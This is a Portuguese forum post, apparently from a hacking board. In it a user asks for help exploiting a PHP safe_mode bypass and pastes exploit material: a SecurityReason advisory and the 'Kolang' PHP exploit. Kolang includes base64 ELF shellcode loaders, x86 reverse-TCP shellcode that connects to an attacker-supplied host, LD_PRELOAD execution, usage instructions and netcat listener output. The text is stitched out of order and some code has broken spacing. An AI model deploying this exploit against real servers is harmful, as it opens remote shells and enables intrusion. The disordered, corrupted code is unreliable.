AAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAA AAAgAAAFwCAABcAgAAlgAAAAAA
AAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA
AP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAA JAAAAAgAAAEADAABAAwAA
IAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYA MAADAAAAADAAAACgAAAAQAAAAI
AAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAA AAAAAAAF4AAAABAAAABgAAAKgD
AACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAA AgBAAAIAQAAOgBAAAAAAAAAAAA
ABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAA AAAAAEAAAAAAAAAHUAAAABAAAA
AgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQ AAAAIAAABEBgAARAYAAAQAAAAA
AAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAA AAAAAAAAAAAAAEAAAAAAAAAI4A
AAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAA CVAAAAAQAAAAMAAAAcHwAAHA8A
AAQAAAAAAAAAAAAAAAQAAAAAAAAAmgAAAAYAAAADAAAAIB8AAC APAADIAAAABAAAAAAAAAAEAAAA
CAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABA AAAAQAAACoAAAAAQAAAAMAAAD0
HwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAA AAGCAAABgQAAAEAAAAAAAAAAAA
AAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAA AAAAAABAAAAAAAAAC8AAAAAQAA
AAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAA MAAAAAAAAAAAAAAMIQAADFAAAA
AAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsA IAABoAAAAeAAAABAAAABAAAAAJ
AAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAA AAAAAAAwADAAAAAABcAgAAAAAA
AAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAA AAAABAAwAAAAAAAAMABwAAAAAA
YAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAA AAAAMACgAAAAAAIAQAAAAAAAAD
AAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAA AARAYAAAAAAAADAA4AAAAAAAwf
AAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAA ADABEAAAAAACAfAAAAAAAAAwAS
AAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAAB ggAAAAAAAAAwAVAAAAAAAcIAAA
AAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABA Dx/w0AAAD0HwAAAAAAAAEC8f8j
AAAAGCAAAAAAAAABAhUAMAAAABgfAAAAAAAAAQIQAD0AAAAHBQ AAAAAAAAICCwBUAAAAIB8AAAAA
AAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAA AAAAAAAAAgAAAAkAAA
AAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAH oAAAASAAAAugAAABwgAAAAAAAA
EADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA
AAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAA AAEgAJAABzaGVsbGNvZGUuYwBf
R0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRF RPUl9FTkRfXwBfX2k2ODYuZ2V0
X3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMA BfX2dtb25fc3RhcnRfXwBfSnZf
UmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2 ZpbmkAcmVhZEBAR0xJQkNfMi4w
AF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV 9maW5hbGl6ZUBAR0xJQkNfMi4x
LjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==" ;
}
if (!function_exists('file_put_contents')){
function file_put_contents($filename, $data){
$f = @fopen($filename, 'w');
if (!$f){
return false;
}
else{
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
}
// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
file_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));
$ip = gethostbyname($host);
$port1 = sprintf('%c', ($port>> 8)&255 );
$port2 = sprintf('%c', ($port>> 0)&255 );
$part = explode('.', $ip);
//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);
$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);
/*
* linux/x86/shell_reverse_tcp - 71 bytes
* Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
* Encoder: generic/none
* LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependChrootBreak=false,
* AppendExit=false
*/
$Xshellcode =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\ x66\xcd\x80".
"\x5b\x5e\x68".$STRINGIP."\x66\x68".$port1.$port2. "\x66\x53\x6a\x10".
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\ xd9\xb0\x3f".
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\ x2f\x62\x69".
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\ x00" ;
if(isset($_REQUEST['shellcode'])){
// just for fans of metasploit
$Xshellcode=base64_decode($_REQUEST['shellcode']);
}
file_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode);
$cwd = '/tmp/';
$env = array('LD_PRELOAD' => '/tmp/shellcode.so');
unset($var);
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"));
// BOOM
proc_open('IHSteam', $descriptorspec, $var, $cwd, $env);
mail("IHSteam","IHSteam","IHSteam","IHSteam");
?>
a vulnerabilidade que quero explorar é PHP safemode bypass
por favor ajudem-me
aqui o código exploit
1º:
[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]
Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 20.11.2008
SecurityReason Research
SecurityAlert Id: 57
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Vendor: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.
error_log
They allow you to define your own error handling rules, as well as modify the way the errors can
be logged. This allows you to change and enhance error reporting to suit your needs.
- --- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode
php.iniÂ*:
safe_mode = On
and declaring via php_admin_flag
<Directory "/www">
...
php_admin_flag safe_mode On
</Directory>
When we create some php script in /www/ and try call to:
ini_set("error_log", "/hack/");
or in /www/.htaccess
php_value error_log "/hack/bleh.php"
Result:
Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
It was for safe_mode declared in php.ini. But if we use
php_admin_flag safe_mode On
in httpd.conf, we will get only
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4
syntax in .htaccess
php_value error_log "/hack/blehx.php"
is allowed and bypass safe_mode.
example exploit:
error_log("<?php phpinfo(); ?>", 0);
- --- 2. How to fix ---
Fixed in CVS
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Note:
Do not use safe_mode as a main safety.
--- 3. Greets ---
sp3x Infospec schain p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# milw0rm.com [2008-11-20]
2º:
<?php
/*
Kolang (PHP Safe mode bypass)
(IHSteam priv8 for lazy penetration testers)
(php 4.3.10 - 5.3.0)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (12/19/2009)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (12/09/2008)
1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)
2- Kolang can execute arbitrary shellcode (just for fans of metasploit )
~~~~ How to use
for linux:
kolang.php?os=linux&host=LHOST&port=LPORT
or
kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE
for freebsd:
kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCO DE
file inclusion :
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
hamid@bugtraq ~ $ nc -vv -l -p 2121
listening on [any] 2121 ...
connect to [127.0.0.1] from bugtraq [127.0.0.1] 40526
id
uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)
Hamid Ebadi
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
contact : ebadi~bugtraq~ir
Kolang means pickaxe (the idea came from amnafzar naming convention)
(Separ, Sarand, Alak, Skort)
*/
$port= intval($_REQUEST['port']);
$host= $_REQUEST['host'];
$os= $_REQUEST['os'];
/*
//compile : cc -o shellcode.so -fPIC -shared shellcode.c
//
//<?php
//$data=file_get_contents('shellcode.so');
//file_put_contents('shellcode_base64.txt',$data);
//?>
// "shellcode loader" : load and execute arbitrary shellcode from a file
// Hamid Ebadi
#define O_RDONLY 00 ; fcntl.h
#define SHELLCODE_MAX_SIZE 1024
// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
#define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"
void getuid()
{
unsetenv("LD_PRELOAD"); //not really necessary, we can remove it
int fd;
char shellcode[SHELLCODE_MAX_SIZE];
char filename[]=SHELLCODE_FILENAME ;
// we can also pass the shellcode in program's arguments
if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {
exit(1);
}
if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){
exit(1);
}
(*(void(*)()) shellcode)();
}
*/
if ($_REQUEST['os']=='freebsd'){
// freebsd shellcode loader (x86)
$shellcode_loader=
"f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAA AAAADQAIAADACgAFwAUAAEAAAAA
AAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFw AA5BcAAPwAAAAYAQAABgAAAAAQ
AAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAA AkAAAAAAAAAB0AAAAeAAAAIgAA
ABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAAC AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAXAAAAFAAAABYA
AAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAJQAAAAAAAAAAwAB
AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAG QEAAAAAAAAAwAEAAAAAACUBAAA
AAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAw AHAAAAAAB4BQAAAAAAAAMACAAA
AAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFw AAAAAAAAMACwAAAAAA7BcAAAAA
AAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADg AAAAAAmBgAAAAAAAADAA8AAAAA
AKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAA AAAAADABIAAAAAAAAAAAAAAAAA
AwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU
BgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAA AAIAAAAJcAAAAAAAAAAAAAABAA
AACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApB gA
AAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA
aQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTk FNSUMAX0dMT0JBTF9PRkZTRVRf
VEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZG VyZWdpc3Rlcl9mcmFtZV9pbmZv
AF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbG Fzc2VzAGdldHVpZAB1bnNldGVu
dgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2 VuZADkFwAACAAAAOgXAAAIAAAA
0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABx QAALQYAAAHFgAAuBgAAAcZAAC8
GAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIw AAg+wM6BQBAADoEwIAAIPEDMMA
AAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABo
EAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ////
/6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD///9VieVT6AAAAABbgcMjEwAAUYC7PAAAAAB1
WIuTLAAAAIXSdB+D7Az/s0D////oXv///4PEEOsMkIPABImDRP/////Si4NE////ixCF0nXpi4Mw
AAAAhcB0EoPsDI2DSP///1DoOP///4PEEMaDPAAAAAGLXfzJw5BVieVT6AAAAABbgcOrEgAAUIuD
OAAAAIXAdBmD7AiNg0AAAABQjYNI////UOhH////g8QQi4P8////hcB0HouDNAAAAIXAdBSD7AyN
g/z///9Q6BH///+DxBCJ9otd/MnDkJCQVYnlV1ZTgew8BAAA6AAAAABbgcM/EgAAg+wMjYPW7v//
UOh9/v//g8QQjb24+///jbPh7v///LkSAAAA86SD7AhqAI2D4e7//1Dopf7//4PEEIlF5IN95AB5
CoPsDGoB6H/+//+D7ARoAAQAAI2F2Pv//1D/deToWP7//4PEEIXAeQqD7AxqAehX/v//jYXY+///
/9CNZfRbXl/Jw5CQkFWJ5VZT6AAAAABbgcOmEQAAjYPw////jXD8i0D86wiQg+4E/9CLBoP4/3X0
W17Jw4PsDOhM/v//g8QMwyRGcmVlQlNEOiBzcmMvbGliL2NzdS9pMzg2LWVsZi9jcn RpLlMsdiAx
LjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUF JFTE9BRAAvdG1wLy5YMTEtSUhT
VEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3 J0bi5TLHYgMS42IDIwMDUvMDUv
MTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAA wAAADUBAAADQAAACQHAAAEAAAA
lAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAw AAAKQYAAACAAAAQAAAABQAAAAR
AAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA
AP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAA AAAAAAAAAAAAAAAABHQ0M6IChH
TlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR0 5VKSAzLjQuNiBbRnJlZUJTRF0g
MjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdID IwMDYwMzA1AAAuc3ltdGFiAC5z
dHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0ALmR5bnN0cg AucmVsLmR5bgAucmVsLnBsdAAu
aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcm FtZQAuZHluYW1pYwAuY3RvcnMA
LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAADcAA AAAgAAAAAAAAAEAAAABAAAACEA
AAALAAAAAgAAAHABAABwAQAAQAIAAAMAAAAUAAAABAAAABAAAA ApAAAAAwAAAAIAAACwAwAAsAMA
ALQAAAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAAZAQAAG QEAAAwAAAAAgAAAAAAAAAEAAAA
CAAAADoAAAAJAAAAAgAAAJQEAACUBAAAQAAAAAIAAAAHAAAABA AAAAgAAABDAAAAAQAAAAYAAADU
BAAA1AQAABEAAAAAAAAAAAAAAAQAAAAAAAAAPgAAAAEAAAAGAA AA6AQAAOgEAACQAAAAAAAAAAAA
AAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAA AAAAAABAAAAAAAAABPAAAAAQAA
AAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAA EAAAACAAAAMAcAADAHAACxAAAA
AAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACA AAAAAAAAAAAAAABAAAAAAAAABj
AAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAA AAbQAAAAYAAAADAAAA8BcAAPAH
AACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAA CQCAAACAAAAAAAAAAAAAAABAAA
AAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAA QAAAAAAAAAhAAAAAEAAAADAAAA
oBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAw AAAKQYAACkCAAAPAAAAAAAAAAA
AAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAA AAAAAAAAQAAAAAAAAAkwAAAAEA
AAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAA ADAAAAAAAAAAAAAABPCQAAnAAA
AAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AAB AEAAAWAAAAMQAAAAQAAAAQAAAA
CQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAw AAAAAAAAMAAwAAAAAAZAQAAAAA
AAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABg AAAAAA6AQAAAAAAAADAAcAAAAA
AHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAA AAAAADAAoAAAAAAOQXAAAAAAAA
AwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAA AAAJAYAAAAAAAAAwAOAAAAAACY
GAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAA AAAwARAAAAAADgGAAAAAAAAAMA
EgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAA AAAAAAAAAAAAMAFQAAAAAAAAAA
AAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/
AQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJg YAAAA
AAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABAB AAgwAAAOgXAAAAAAAAAQALAIcA
AADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAA AYAAAAAQASALIAAADwBQAAAAAA
AAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA
7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAA AAAAIACAAIAQAAAAAAAAAAAAAE
APH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA
AAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAAAAAQAAAASwEAAPA XAAAAAAAAEQDx
/1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQ EAAAAAAAAEgAGAHABAAAAAAAA
AAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEA Dx/5kBAAAkBwAAAAAAABIACQCf
AQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA
AAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAA DfAQAAAAAAAAAAAAAgAAAAAC91
c3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW 5kIGxpbmU+ADxidWlsdC1pbj4A
Y3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX1 8AX19FSF9GUkFNRV9CRUdJTl9f
AF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG 9iYWxfZHRvcnNfYXV4AG9iamVj
dC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU 5EX18AX19GUkFNRV9FTkRfXwBf
X0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci 9zcmMvbGliL2NzdS9pMzg2LWVs
Zi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2 V0ZW52AF9EWU5BTUlDAF9fY3hh
X2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZn JhbWVfaW5mbwByZWFkAF9fYnNz
X3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQU JMRV8AX2VuZABleGl0AG9wZW4A
X0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2 luZm8A";
}else{
// default: linux
// linux shellcode loader (x86)
$shellcode_loader=
"f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAIAQAADQAAACIEQAAA AAAADQAIAAGACgAGwAYAAEAAAAA
AAAAAAAAAAAAAABIBgAASAYAAAUAAAAAEAAAAQAAAAwPAAAMHw AADB8AABABAAAYAQAABgAAAAAQ
AAACAAAAIA8AACAfAAAgHwAAyAAAAMgAAAAGAAAABAAAAFHldG QAAAAAAAAAAAAAAAAAAAAAAAAA
AAYAAAAEAAAAUuV0ZAwPAAAMHwAADB8AAPQAAAD0AAAABAAAAA EAAACAFQRlAAAAAAAAAAAAAAAA
AAAAAAAAAAAAKAAABAAAAAMAAAAOAAAADAAAAAcAAAAGAAAAAA AAAAAAAAAAAAAAAgAAAAAAAAAN
AAAACwAAAAkAAAADAAAABQAAAAgAAAABAAAACgAAAAQAAAADAA AACAAAAAIAAAAGAAAAiAAhAQDE
QAkIAAAACwAAAA0AAAAGpIf/uuOSfENF1ezYcVgcuY3xDuvT7w4AAAAAAAAAAAAAAAAAAAAATw AA
AAAAAAB6AAAAEgAAAAEAAAAAAAAAAAAAACAAAAArAAAAAAAAAA AAAAAgAAAARgAAAAAAAAD+AAAA
EgAAAFkAAAAAAAAAegAAABIAAAAcAAAAAAAAAAsBAAAiAAAAVA AAAAAAAAD9AAAAEgAAAD8AAAAM
BQAAvQAAABIACwB7AAAAJCAAAAAAAAAQAPH/aAAAABwgAAAAAAAAEADx/28AAAAcIAAAAAAAABAA
8f8QAAAAkAMAAAAAAAASAAkAFgAAAAgGAAAAAAAAEgAMAABfX2 dtb25fc3RhcnRfXwBfaW5pdABf
ZmluaQBfX2N4YV9maW5hbGl6ZQBfSnZfUmVnaXN0ZXJDbGFzc2 VzAGdldHVpZAB1bnNldGVudgBv
cGVuAGV4aXQAcmVhZABsaWJjLnNvLjYAX2VkYXRhAF9fYnNzX3 N0YXJ0AF9lbmQAR0xJQkNfMi4x
LjMAR0xJQkNfMi4wAAAAAgAAAAAAAgACAAMAAgABAAEAAQABAA EAAQAAAAEAAgBeAAAAEAAAAAAA
AABzH2kJAAADAIAAAAAQAAAAEGlpDQAAAgCMAAAAAAAAABggAA AIAAAA6B8AAAYCAADsHwAABgMA
APAfAAAGBgAAACAAAAcBAAAEIAAABwIAAAggAAAHBAAADCAAAA cFAAAQIAAABwYAABQgAAAHBwAA
VYnlg+wI6IUAAADoMAEAAOgrAgAAycMA/7MEAAAA/6MIAAAAAAAAAP+jDAAAAGgAAAAA6eD/////
oxAAAABoCAAAAOnQ/////6MUAAAAaBAAAADpwP////+jGAAAAGgYAAAA6bD/////oxwAAABoIAAA
AOmg/////6MgAAAAaCgAAADpkP///wAAAAAAAAAAVYnlU4PsBOgAAAAAW4HDyBsAAIuT9P///4XS
dAXohv///1hbycOQkJCQkJCQkJCQVYnlVlPorQAAAIHDmhsAAIPsEIC7KAA AAAB1XYuD/P///4XA
dA6LgyQAAACJBCTodP///4uLLAAAAI2DJP///42TIP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmD
LAAAAP+UgyD///+LiywAAAA58XLmxoMoAAAAAYPEEFteXcNVieVT6C4AAACBwxsb AACD7ASLkyj/
//+F0nQVi5P4////hdJ0C42DKP///4kEJP/Sg8QEW13Dixwkw5BVieVTgew0BAAA6Oz///+Bw9ka
AACNgzDm//+JBCToqf7//8eF5vv//y90bXDHher7//8vLlgxx4Xu+///MS1JSMeF8vv//1NURUFm
x4X2+///TQDHRCQEAAAAAI2DO+b//4kEJOhC/v//iUX4g334AHkMxwQkAQAAAOh9/v//x0QkCAAE
AACNhfj7//+JRCQEi0X4iQQk6ED+//+FwHkMxwQkAQAAAOhQ/v//jYX4+////9CBxDQEAABbXcOQ
kJCQkJCQVYnlVlPoLf///4HDGhoAAIuDGP///4P4/3QZjbMY////jbQmAAAAAIPuBP/QiwaD+P91
9FteXcNVieVTg+wE6AAAAABbgcPgGQAA6DD+//9ZW8nDTERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT
VEVBTQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
